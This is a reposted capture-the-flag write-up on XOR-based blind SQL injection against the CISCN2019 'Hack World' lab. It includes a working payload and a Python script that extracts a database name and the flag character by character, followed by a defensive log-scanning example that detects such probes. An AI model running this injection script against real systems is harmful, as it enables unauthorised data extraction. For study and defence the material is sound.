[CISCN2019 North China Division Day2 Web1] Hack World: Notes on XOR Injection

0x00: Preface

I had rarely run into XOR injection before,

so today I am writing it down.

Reproduction environment: https://buuoj.cn/

0x01: XOR injection

0x02: Blind injection payload

id=(ascii(substr((select(flag)from(flag)),1,1000))>1)^1

import requests

url = "http://170a957a-daae-4912-8f7e-5452c854f8de.node3.buuoj.cn/index.php"

def DBlen():  # blind-inject the length of the database name
    for i in range(1, 40):
        # (length(database()) > i) ^ 1 is 1 exactly when length <= i,
        # so the first i that returns the "true" page is the length itself
        parm = "(length(database())>" + str(i) + ")^1"
        data = {'id': parm}
        req = requests.post(url, data)
        if ("Hello, glzjin wants a girlfriend." in req.text):
            return i

def DBname(dblen):  # blind-inject the database name
    # (ascii(substr(database(),2,11))>100)^1
    dbname = ""
    for i in range(1, dblen + 1):  # MySQL substr() positions start at 1, not 0
        for j in range(0, 300):
            parm = "(ascii(substr(database()," + str(i) + "," + str(dblen) + "))>" + str(j) + ")^1"
            data = {'id': parm}  # was the set literal {'id', parm}; must be a dict
            req = requests.post(url, data)  # was posting parm instead of data
            if ("Hello, glzjin wants a girlfriend." in req.text):
                dbname += chr(j)
                break  # first j with ascii <= j is the character itself; stop here
    return dbname

def getflag():
    # payload="(ascii(substr((select(flag)from(flag)),1,1000))>102)^1"
    flag = ""
    for j in range(1, 50):
        for i in range(1, 256):
            parm = "(ascii(substr((select(flag)from(flag)),%s,1000))>%s)^1" % (str(j), str(i))
            data = {'id': parm}
            req = requests.post(url, data)
            if ("Hello, glzjin wants a girlfriend." in req.text):
                if i == 1:  # ascii('') is 0, so we are past the end of the flag
                    return flag
                flag += chr(i)
                break  # first i with ascii <= i is the character itself; stop here

    return flag

def main():
    length = DBlen()  # database name length
    print("数据库长度:" + str(length))
    dbname = DBname(length)
    print("数据库名字:" + dbname)
def main1():
    print(getflag())
if __name__ == '__main__':
    main1()

This challenge is solved with blind injection.

ascii: returns the ASCII code of the first character of a string
substr: substring extraction (in MySQL, substr's start position begins at 1); substr's len can be arbitrarily large, which does not matter here
The comparison (ascii(substr((select(flag)from(flag)),1,1000))>1) evaluates to 1 or 0, and that value is then XORed with 1;
from the page's response you can tell which it was, and so determine the flag character by character.

Environment issue: the script cannot be run as is, because requests that are too frequent get a 429.
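As an added defender-side example (not code from the original post), the following Python flags the (cond)^1 probe shape described above in request logs and counts hits per source, which is the signal a rate limit such as the 429 the author ran into would key on. The log format with a body= field, the IPs and the sample lines are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post); the "body=" field is a hypothetical format.
SAMPLE_LOGS = [
    "10.0.0.5 POST /index.php body=id=1",
    "10.0.0.7 POST /index.php body=id=(length(database())>3)^1",
    "10.0.0.7 POST /index.php body=id=(ascii(substr(database(),1,1))>100)^1",
    "10.0.0.7 POST /index.php body=id=(ascii(substr((select(flag)from(flag)),1,1000))>102)^1",
    "10.0.0.9 POST /index.php body=id=2",
    "10.0.0.7 POST /index.php body=id=%28ascii%28substr%28database%28%29%2C2%2C1%29%29%3E110%29%5E1",
]

LOG_LINE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) body=(?P<body>.*)$")
# A parenthesised expression XORed with a constant: the (cond)^1 shape the write-up uses.
XOR_PROBE = re.compile(r"\)\s*\^\s*\d")
# MySQL functions used to measure and slice strings one character at a time.
BLIND_FUNCS = re.compile(r"\b(ascii|substr|substring|length|database)\s*\(", re.IGNORECASE)

def extract_id(body):
    # Return the URL-decoded value of the id parameter, or None if absent.
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key == "id":
            return unquote_plus(value)
    return None

def classify(line):
    # Return (ip, decoded id, reasons) for a suspicious line, else None.
    m = LOG_LINE.match(line)
    if not m:
        return None
    value = extract_id(m.group("body"))
    if value is None or value.isdigit():  # a plain numeric id is what the app expects
        return None
    reasons = []
    if XOR_PROBE.search(value):
        reasons.append("xor-probe")
    if BLIND_FUNCS.search(value):
        reasons.append("blind-func")
    return (m.group("ip"), value, reasons) if reasons else None

def scan(lines):
    # Return (per-IP hit counter, alert list) over a list of log lines.
    hits, alerts = Counter(), []
    for line in lines:
        result = classify(line)
        if result:
            hits[result[0]] += 1
            alerts.append(result)
    return hits, alerts
```

The per-IP counter is what you would feed into a threshold or rate limit; the alert list carries the decoded payload so that URL-encoded probes are not missed.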


Reposted from www.cnblogs.com/Tkitn/p/12000240.html